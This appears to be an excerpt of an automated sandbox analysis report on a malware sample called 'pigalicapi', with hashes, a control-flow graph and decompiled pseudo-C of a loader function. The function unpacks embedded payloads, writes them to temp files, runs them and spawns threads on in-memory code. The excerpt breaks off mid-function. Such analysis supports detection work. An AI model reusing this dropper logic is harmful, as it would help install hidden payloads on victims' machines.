                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrcat$lstrlen$InfoSystemVersion
                                                                                                                                                                                                                                                                                          • String ID: UndefinedOS$Vista$Win2K$Win7$Win8$WinHomeServer$WinServer2003$WinServer2003R2$WinServer2008$WinServer2008R2$WinServer2012$WinXP$WinXP64$_x64
                                                                                                                                                                                                                                                                                          • API String ID: 3139318632-332591429
                                                                                                                                                                                                                                                                                          • Opcode ID: b80c610fb93e26c1f6b8a0e3d57eccb9ead3b078b5df3064abf97d281ea2cf4c
                                                                                                                                                                                                                                                                                          • Instruction ID: 2fdea20511d00b83c143a5217ffb9651c4d2114897e9ccdf2931e29d93762e72
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b80c610fb93e26c1f6b8a0e3d57eccb9ead3b078b5df3064abf97d281ea2cf4c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A81F9B4644209EBFB249F60C849BAE7BB5FB49301F00C659F905BA2C1D779E9C1CB61
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 298 40062b0-40062c4 299 40062ca-40062ce 298->299 300 4006c4e 298->300 299->300 302 40062d4-40062e0 299->302 301 4006c51-4006c54 300->301 302->300 303 40062e6-40062ed 302->303 303->300 304 40062f3-4006314 303->304 306 400631a-400631e 304->306 307 400642e-4006453 304->307 308 4006320-400633a 306->308 309 4006343-4006363 306->309 314 4006459-400645d 307->314 315 4006c2f-4006c36 307->315 308->309 311 400633c-400633e 308->311 312 4006429 309->312 313 4006369-4006375 309->313 311->301 312->307 313->312 320 400637b-4006384 313->320 316 4006482-40064a2 314->316 317 400645f-4006479 314->317 318 4006c44 315->318 319 4006c38-4006c42 315->319 323 40065f3-40065fc 316->323 324 40064a8-40064b4 316->324 317->316 321 400647b-400647d 317->321 318->300 319->300 320->312 322 400638a-4006393 320->322 321->301 322->312 325 4006399-40063a2 322->325 326 4006603-400660f 323->326 327 40065fe 323->327 324->323 328 40064ba-400654c GetEnvironmentVariableA call 4007d20 call 4009730 GetTickCount GetTempFileNameA CreateFileA 324->328 331 4006410-4006424 call 4001ee0 325->331 332 40063a4-40063ca VirtualAlloc 325->332 329 4006615-4006621 326->329 330 4006bdd-4006be9 326->330 327->327 328->323 353 4006552-4006586 WriteFile 328->353 329->330 336 4006627-4006640 call 4007250 329->336 339 4006c18-4006c24 330->339 340 4006beb-4006bf7 330->340 342 4006427 331->342 337 40063cc-40063e4 call 4006260 332->337 338 400640e 332->338 354 4006642 336->354 355 4006647-400664e 336->355 356 40063e6-40063fa call 4001ee0 337->356 357 40063fd-4006408 VirtualFree 337->357 338->342 347 4006c26 339->347 348 4006c2a 339->348 340->339 346 4006bf9-4006c16 call 400a360 340->346 342->307 346->348 347->348 348->348 359 4006588-4006591 353->359 360 40065dd-40065e4 353->360 354->355 361 4006752-400675b 355->361 362 4006654-4006674 VirtualAlloc 355->362 356->357 357->338 359->360 366 4006593-40065c7 CloseHandle call 4006c60 call 4001e60 359->366 360->323 367 40065e6-40065ed CloseHandle 360->367 364 4006761-4006788 361->364 365 40069ba-4006a49 GetEnvironmentVariableA call 4007d20 call 4009730 GetTickCount GetTempFileNameA CreateFileA 361->365 362->361 368 400667a-4006747 call 4007b70 call 40097a0 CreateThread CloseHandle 362->368 370 4006858-4006864 call 4002070 364->370 371 400678e-40067c0 VirtualAlloc 364->371 399 4006bd6 365->399 400 4006a4f-4006a75 365->400 397 40065d8 366->397 398 40065c9-40065d0 call 40074a0 ExitProcess 366->398 367->323 368->361 386 400686a-4006871 370->386 376 4006856 371->376 377 40067c6-40067e7 call 4006260 371->377 376->386 395 4006842-4006850 VirtualFree 377->395 396 40067e9-4006807 call 4002070 377->396 387 40069b0 386->387 388 4006877-400687e 386->388 387->365 393 4006880-4006891 call 40073c0 388->393 394 4006894-400689d 388->394 393->394 402 40068a3-40068c8 call 40097a0 394->402 403 400698a-4006993 394->403 395->376 396->395 423 4006809-400683a VirtualAlloc call 4007b70 396->423 397->360 406 40065d8 call 4006cf0 397->406 399->330 407 4006a7b-4006aad VirtualAlloc 400->407 408 4006b1e-4006b3c WriteFile 400->408 427 40068e9-400690d VirtualAlloc 402->427 428 40068ca-40068e7 402->428 411 4006995-40069a6 call 4002510 403->411 412 40069a9 403->412 406->360 409 4006b1c 407->409 410 4006aaf-4006ad0 call 4006260 407->410 414 4006b42-4006b49 408->414 409->414 430 4006ad2-4006b02 WriteFile 410->430 431 4006b08-4006b16 VirtualFree 410->431 411->412 412->387 420 4006bc9-4006bd0 CloseHandle 414->420 421 4006b4b-4006b57 414->421 420->399 421->420 426 4006b59-4006b82 CloseHandle call 4001e60 421->426 434 400683f 423->434 439 4006b84-4006b8b 426->439 440 4006bc7 426->440 433 4006934-400693d 427->433 435 400690f-4006931 call 4007b70 427->435 428->433 430->431 431->409 433->403 436 400693f-4006984 CreateThread CloseHandle 433->436 434->395 435->433 436->403 442 4006ba1-4006baa 439->442 443 4006b8d-4006b9e call 40073c0 439->443 440->399 444 4006bc0 442->444 445 4006bac-4006bbd call 4002510 442->445 443->442 444->440 445->444
                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E040062B0(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				signed int _v13;
                                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                                          				void _v36;
                                                                                                                                                                                                                                                                                          				void* _v40;
                                                                                                                                                                                                                                                                                          				long _v44;
                                                                                                                                                                                                                                                                                          				signed int _v48;
                                                                                                                                                                                                                                                                                          				void* _v52;
                                                                                                                                                                                                                                                                                          				long _v56;
                                                                                                                                                                                                                                                                                          				void _v60;
                                                                                                                                                                                                                                                                                          				char _v324;
                                                                                                                                                                                                                                                                                          				void* _v328;
                                                                                                                                                                                                                                                                                          				char _v340;
                                                                                                                                                                                                                                                                                          				char _v604;
                                                                                                                                                                                                                                                                                          				int _v608;
                                                                                                                                                                                                                                                                                          				long _v612;
                                                                                                                                                                                                                                                                                          				signed int _v616;
                                                                                                                                                                                                                                                                                          				void* _v620;
                                                                                                                                                                                                                                                                                          				void* _v624;
                                                                                                                                                                                                                                                                                          				void* _v628;
                                                                                                                                                                                                                                                                                          				int _v632;
                                                                                                                                                                                                                                                                                          				signed int _v636;
                                                                                                                                                                                                                                                                                          				long _v640;
                                                                                                                                                                                                                                                                                          				void* _v644;
                                                                                                                                                                                                                                                                                          				void* _v648;
                                                                                                                                                                                                                                                                                          				void* _v652;
                                                                                                                                                                                                                                                                                          				char _v916;
                                                                                                                                                                                                                                                                                          				void* _v920;
                                                                                                                                                                                                                                                                                          				char _v932;
                                                                                                                                                                                                                                                                                          				char _v1196;
                                                                                                                                                                                                                                                                                          				long _v1200;
                                                                                                                                                                                                                                                                                          				int _v1204;
                                                                                                                                                                                                                                                                                          				long _v1208;
                                                                                                                                                                                                                                                                                          				void* _v1212;
                                                                                                                                                                                                                                                                                          				long _v1216;
                                                                                                                                                                                                                                                                                          				signed int _v1220;
                                                                                                                                                                                                                                                                                          				void* _v1224;
                                                                                                                                                                                                                                                                                          				void* _v1228;
                                                                                                                                                                                                                                                                                          				intOrPtr _t317;
                                                                                                                                                                                                                                                                                          				signed char _t321;
                                                                                                                                                                                                                                                                                          				void* _t333;
                                                                                                                                                                                                                                                                                          				signed int _t340;
                                                                                                                                                                                                                                                                                          				void* _t349;
                                                                                                                                                                                                                                                                                          				signed int _t355;
                                                                                                                                                                                                                                                                                          				void* _t361;
                                                                                                                                                                                                                                                                                          				void* _t368;
                                                                                                                                                                                                                                                                                          				void* _t378;
                                                                                                                                                                                                                                                                                          				void* _t381;
                                                                                                                                                                                                                                                                                          				signed int _t383;
                                                                                                                                                                                                                                                                                          				void* _t386;
                                                                                                                                                                                                                                                                                          				void* _t393;
                                                                                                                                                                                                                                                                                          				int _t415;
                                                                                                                                                                                                                                                                                          				signed int _t421;
                                                                                                                                                                                                                                                                                          				signed int _t428;
                                                                                                                                                                                                                                                                                          				signed char _t433;
                                                                                                                                                                                                                                                                                          				void* _t439;
                                                                                                                                                                                                                                                                                          				signed char _t442;
                                                                                                                                                                                                                                                                                          				void* _t448;
                                                                                                                                                                                                                                                                                          				signed int _t452;
                                                                                                                                                                                                                                                                                          				intOrPtr _t455;
                                                                                                                                                                                                                                                                                          				void* _t465;
                                                                                                                                                                                                                                                                                          				void* _t472;
                                                                                                                                                                                                                                                                                          				void* _t473;
                                                                                                                                                                                                                                                                                          				void* _t508;
                                                                                                                                                                                                                                                                                          				void* _t509;
                                                                                                                                                                                                                                                                                          				void* _t528;
                                                                                                                                                                                                                                                                                          				void* _t529;
                                                                                                                                                                                                                                                                                          				void* _t539;
                                                                                                                                                                                                                                                                                          				void* _t549;
                                                                                                                                                                                                                                                                                          				void* _t550;
                                                                                                                                                                                                                                                                                          				void* _t551;
                                                                                                                                                                                                                                                                                          				void* _t563;
                                                                                                                                                                                                                                                                                          				void* _t598;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                                          					L99:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v12 =  *_a4;
                                                                                                                                                                                                                                                                                          					if(_v12 > 0 && _v12 < 0x400) {
                                                                                                                                                                                                                                                                                          						_v20 = _a4 + 4;
                                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                                          						while(_v24 < _v12) {
                                                                                                                                                                                                                                                                                          							if(_v24 <= 0) {
                                                                                                                                                                                                                                                                                          								L10:
                                                                                                                                                                                                                                                                                          								_v28 = _v20 + 0x18;
                                                                                                                                                                                                                                                                                          								_v32 =  *_v20 - 0x18;
                                                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e270; // 0x1
                                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          									L22:
                                                                                                                                                                                                                                                                                          									_t428 = _v24 + 1;
                                                                                                                                                                                                                                                                                          									__eflags = _t428;
                                                                                                                                                                                                                                                                                          									_v24 = _t428;
                                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e284; // 0x1
                                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          									goto L22;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t508 = _v20;
                                                                                                                                                                                                                                                                                          								__eflags =  *(_t508 + 0xc) & 0x00000002;
                                                                                                                                                                                                                                                                                          								if(( *(_t508 + 0xc) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                                          									goto L22;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								__eflags =  *0x401435d & 0x000000ff;
                                                                                                                                                                                                                                                                                          								if(( *0x401435d & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          									goto L22;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t509 = _v20;
                                                                                                                                                                                                                                                                                          								__eflags =  *(_t509 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                                          								if(( *(_t509 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                          									_t433 = E04001EE0(_v28, 0xea60);
                                                                                                                                                                                                                                                                                          									_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                                          									_v8 = _t433 & 0x000000ff;
                                                                                                                                                                                                                                                                                          									L21:
                                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_v44 =  *((intOrPtr*)(_v28 + _v32 - 4));
                                                                                                                                                                                                                                                                                          								_v40 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                                          								__eflags = _v40;
                                                                                                                                                                                                                                                                                          								if(_v40 == 0) {
                                                                                                                                                                                                                                                                                          									L19:
                                                                                                                                                                                                                                                                                          									goto L21;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t439 = E04006260(_v40, _v28, _v32, _v40, _v44);
                                                                                                                                                                                                                                                                                          								__eflags = _t439 - _v44;
                                                                                                                                                                                                                                                                                          								if(_t439 == _v44) {
                                                                                                                                                                                                                                                                                          									_t442 = E04001EE0(_v40, 0xea60);
                                                                                                                                                                                                                                                                                          									_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                                          									_v8 = _t442 & 0x000000ff;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								VirtualFree(_v40, 0, 0x8000);
                                                                                                                                                                                                                                                                                          								goto L19;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_v36 =  *_v20;
                                                                                                                                                                                                                                                                                          								_v20 = _v20 + _v36;
                                                                                                                                                                                                                                                                                          								if(_v20 <= _a4 + _a8) {
                                                                                                                                                                                                                                                                                          									goto L10;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									return 0;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v13 = 0;
                                                                                                                                                                                                                                                                                          						_v20 = _a4 + 4;
                                                                                                                                                                                                                                                                                          						_v48 = 0;
                                                                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                                                                          							__eflags = _v48 - _v12;
                                                                                                                                                                                                                                                                                          							if(_v48 >= _v12) {
                                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							__eflags = _v48;
                                                                                                                                                                                                                                                                                          							if(_v48 <= 0) {
                                                                                                                                                                                                                                                                                          								L29:
                                                                                                                                                                                                                                                                                          								_v52 = _v20 + 0x18;
                                                                                                                                                                                                                                                                                          								_v56 =  *_v20 - 0x18;
                                                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e274; // 0x2
                                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          									L39:
                                                                                                                                                                                                                                                                                          									_t448 = _v20;
                                                                                                                                                                                                                                                                                          									__eflags =  *(_t448 + 0xc) & 0x00000002;
                                                                                                                                                                                                                                                                                          									if(( *(_t448 + 0xc) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                                          										__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e270; // 0x1
                                                                                                                                                                                                                                                                                          										if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          											L90:
                                                                                                                                                                                                                                                                                          											__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e278; // 0x3
                                                                                                                                                                                                                                                                                          											if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          												L93:
                                                                                                                                                                                                                                                                                          												__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e27c; // 0x4
                                                                                                                                                                                                                                                                                          												if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          													_v13 = 1;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												L95:
                                                                                                                                                                                                                                                                                          												L24:
                                                                                                                                                                                                                                                                                          												_t452 = _v48 + 1;
                                                                                                                                                                                                                                                                                          												__eflags = _t452;
                                                                                                                                                                                                                                                                                          												_v48 = _t452;
                                                                                                                                                                                                                                                                                          												continue;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e288; // 0x2
                                                                                                                                                                                                                                                                                          											if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          												goto L93;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											_t317 =  *0x400e28c; // 0x4013f88
                                                                                                                                                                                                                                                                                          											_t455 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                          											E0400A360(_t455, _t317, _v52, _v56);
                                                                                                                                                                                                                                                                                          											_t598 = _t598 + 0x10;
                                                                                                                                                                                                                                                                                          											goto L95;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e284; // 0x1
                                                                                                                                                                                                                                                                                          										if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          											goto L90;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										_t321 = E04007250(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                                          										_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                                          										__eflags = _t321 & 0x000000ff;
                                                                                                                                                                                                                                                                                          										if((_t321 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          											_t528 = _v20;
                                                                                                                                                                                                                                                                                          											__eflags =  *(_t528 + 0x14);
                                                                                                                                                                                                                                                                                          											if( *(_t528 + 0x14) == 0) {
                                                                                                                                                                                                                                                                                          												L48:
                                                                                                                                                                                                                                                                                          												_t529 = _v20;
                                                                                                                                                                                                                                                                                          												__eflags =  *(_t529 + 0xc) & 0x00000001;
                                                                                                                                                                                                                                                                                          												if(( *(_t529 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                          													GetEnvironmentVariableA("TEMP",  &_v1196, 0x104);
                                                                                                                                                                                                                                                                                          													E04007D20( &_v932,  &_v932, 0, 0xa);
                                                                                                                                                                                                                                                                                          													E04009730( &_v932, 4);
                                                                                                                                                                                                                                                                                          													_t598 = _t598 + 0x14;
                                                                                                                                                                                                                                                                                          													GetTempFileNameA( &_v1196,  &_v932, GetTickCount() % 0xffff,  &_v916);
                                                                                                                                                                                                                                                                                          													_v920 = CreateFileA( &_v916, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                                          													__eflags = _v920 - 0xffffffff;
                                                                                                                                                                                                                                                                                          													if(_v920 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          														L89:
                                                                                                                                                                                                                                                                                          														goto L24;
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													_v1200 = 0;
                                                                                                                                                                                                                                                                                          													_v1204 = 0;
                                                                                                                                                                                                                                                                                          													_v1208 = _v56;
                                                                                                                                                                                                                                                                                          													_t333 = _v20;
                                                                                                                                                                                                                                                                                          													__eflags =  *(_t333 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                                          													if(( *(_t333 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                          														_v1204 = WriteFile(_v920, _v52, _v56,  &_v1200, 0);
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          														_v1216 =  *((intOrPtr*)(_v52 + _v56 - 4));
                                                                                                                                                                                                                                                                                          														_v1212 = VirtualAlloc(0, _v1216, 0x3000, 4);
                                                                                                                                                                                                                                                                                          														__eflags = _v1212;
                                                                                                                                                                                                                                                                                          														if(_v1212 != 0) {
                                                                                                                                                                                                                                                                                          															_t349 = E04006260(_v56, _v52, _v56, _v1212, _v1216);
                                                                                                                                                                                                                                                                                          															__eflags = _t349 - _v1216;
                                                                                                                                                                                                                                                                                          															if(_t349 == _v1216) {
                                                                                                                                                                                                                                                                                          																_v1204 = WriteFile(_v920, _v1212, _v1216,  &_v1200, 0);
                                                                                                                                                                                                                                                                                          																_v1208 = _v1216;
                                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                                          															VirtualFree(_v1212, 0, 0x8000);
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													__eflags = _v1204;
                                                                                                                                                                                                                                                                                          													if(_v1204 == 0) {
                                                                                                                                                                                                                                                                                          														L88:
                                                                                                                                                                                                                                                                                          														CloseHandle(_v920);
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          														__eflags = _v1200 - _v1208;
                                                                                                                                                                                                                                                                                          														if(_v1200 != _v1208) {
                                                                                                                                                                                                                                                                                          															goto L88;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          														CloseHandle(_v920);
                                                                                                                                                                                                                                                                                          														_t340 = E04001E60( &_v916);
                                                                                                                                                                                                                                                                                          														_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                                          														_v1220 = _t340;
                                                                                                                                                                                                                                                                                          														__eflags = _v1220;
                                                                                                                                                                                                                                                                                          														if(_v1220 != 0) {
                                                                                                                                                                                                                                                                                          															_t465 = _v20;
                                                                                                                                                                                                                                                                                          															__eflags =  *(_t465 + 0x10);
                                                                                                                                                                                                                                                                                          															if( *(_t465 + 0x10) != 0) {
                                                                                                                                                                                                                                                                                          																E040073C0(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                                          																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                                          															_t539 = _v20;
                                                                                                                                                                                                                                                                                          															__eflags =  *(_t539 + 0xc) & 0x00000004;
                                                                                                                                                                                                                                                                                          															if(( *(_t539 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                          																E04002510(_v1220, 0x400e290);
                                                                                                                                                                                                                                                                                          																_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                                          															_v8 = 1;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													goto L89;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												_v636 = 0;
                                                                                                                                                                                                                                                                                          												_v632 = 0;
                                                                                                                                                                                                                                                                                          												_v640 = 0;
                                                                                                                                                                                                                                                                                          												_t472 = _v20;
                                                                                                                                                                                                                                                                                          												__eflags =  *(_t472 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                                          												if(( *(_t472 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                          													_t355 = E04002070(_v52);
                                                                                                                                                                                                                                                                                          													_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                                          													_v636 = _t355;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													_v640 =  *((intOrPtr*)(_v52 + _v56 - 4));
                                                                                                                                                                                                                                                                                          													_t378 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          													_v644 = _t378;
                                                                                                                                                                                                                                                                                          													__eflags = _v644;
                                                                                                                                                                                                                                                                                          													if(_v644 != 0) {
                                                                                                                                                                                                                                                                                          														_t381 = E04006260(_v644, _v52, _v56, _v644, _v640);
                                                                                                                                                                                                                                                                                          														__eflags = _t381 - _v640;
                                                                                                                                                                                                                                                                                          														if(_t381 == _v640) {
                                                                                                                                                                                                                                                                                          															_t383 = E04002070(_v644); // executed
                                                                                                                                                                                                                                                                                          															_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                                          															_v636 = _t383;
                                                                                                                                                                                                                                                                                          															_t563 = _v20;
                                                                                                                                                                                                                                                                                          															__eflags =  *(_t563 + 0xc) & 0x00000008;
                                                                                                                                                                                                                                                                                          															if(( *(_t563 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                          																_t386 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          																_v632 = _t386;
                                                                                                                                                                                                                                                                                          																E04007B70(_v632, _v644, _v640);
                                                                                                                                                                                                                                                                                          																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          														VirtualFree(_v644, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												__eflags = _v636;
                                                                                                                                                                                                                                                                                          												if(_v636 != 0) {
                                                                                                                                                                                                                                                                                          													_t473 = _v20;
                                                                                                                                                                                                                                                                                          													__eflags =  *(_t473 + 0x10);
                                                                                                                                                                                                                                                                                          													if( *(_t473 + 0x10) != 0) {
                                                                                                                                                                                                                                                                                          														E040073C0(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                                          														_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													_t549 = _v20;
                                                                                                                                                                                                                                                                                          													__eflags =  *(_t549 + 0xc) & 0x00000008;
                                                                                                                                                                                                                                                                                          													if(( *(_t549 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                          														_t361 = E040097A0(0x10);
                                                                                                                                                                                                                                                                                          														_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                                          														_v1228 = _t361;
                                                                                                                                                                                                                                                                                          														_v648 = _v1228;
                                                                                                                                                                                                                                                                                          														_t551 = _v20;
                                                                                                                                                                                                                                                                                          														__eflags =  *(_t551 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                                          														if(( *(_t551 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                          															 *_v648 = VirtualAlloc(0, _v56, 0x3000, 4);
                                                                                                                                                                                                                                                                                          															__eflags =  *_v648;
                                                                                                                                                                                                                                                                                          															if( *_v648 != 0) {
                                                                                                                                                                                                                                                                                          																E04007B70( *_v648, _v52, _v56);
                                                                                                                                                                                                                                                                                          																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                                          																 *(_v648 + 4) = _v56;
                                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                                                                                                          															 *_v648 = _v632;
                                                                                                                                                                                                                                                                                          															 *(_v648 + 4) = _v640;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          														__eflags =  *_v648;
                                                                                                                                                                                                                                                                                          														if( *_v648 != 0) {
                                                                                                                                                                                                                                                                                          															 *((intOrPtr*)(_v648 + 8)) =  *((intOrPtr*)(_v20 + 0xc));
                                                                                                                                                                                                                                                                                          															 *((intOrPtr*)(_v648 + 0xc)) = _v636;
                                                                                                                                                                                                                                                                                          															_t368 = CreateThread(0, 0, E040077B0, _v648, 0, 0); // executed
                                                                                                                                                                                                                                                                                          															_v652 = _t368;
                                                                                                                                                                                                                                                                                          															CloseHandle(_v652);
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													_t550 = _v20;
                                                                                                                                                                                                                                                                                          													__eflags =  *(_t550 + 0xc) & 0x00000004;
                                                                                                                                                                                                                                                                                          													if(( *(_t550 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                          														E04002510(_v636, 0x400e290);
                                                                                                                                                                                                                                                                                          														_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													_v8 = 1;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												goto L24;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											_v620 = VirtualAlloc(0, _v56, 0x3000, 4);
                                                                                                                                                                                                                                                                                          											__eflags = _v620;
                                                                                                                                                                                                                                                                                          											if(_v620 == 0) {
                                                                                                                                                                                                                                                                                          												goto L48;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											E04007B70(_v620, _v52, _v56);
                                                                                                                                                                                                                                                                                          											_t393 = E040097A0(0x20);
                                                                                                                                                                                                                                                                                          											_t598 = _t598 + 0x10;
                                                                                                                                                                                                                                                                                          											_v1224 = _t393;
                                                                                                                                                                                                                                                                                          											_v624 = _v1224;
                                                                                                                                                                                                                                                                                          											 *_v624 =  *_v20;
                                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 4)) =  *((intOrPtr*)(_v20 + 4));
                                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 8)) =  *((intOrPtr*)(_v20 + 8));
                                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 0x14)) =  *((intOrPtr*)(_v20 + 0x14));
                                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 0x1c)) = _v56;
                                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 0xc)) =  *((intOrPtr*)(_v20 + 0xc));
                                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 0x10)) =  *((intOrPtr*)(_v20 + 0x10));
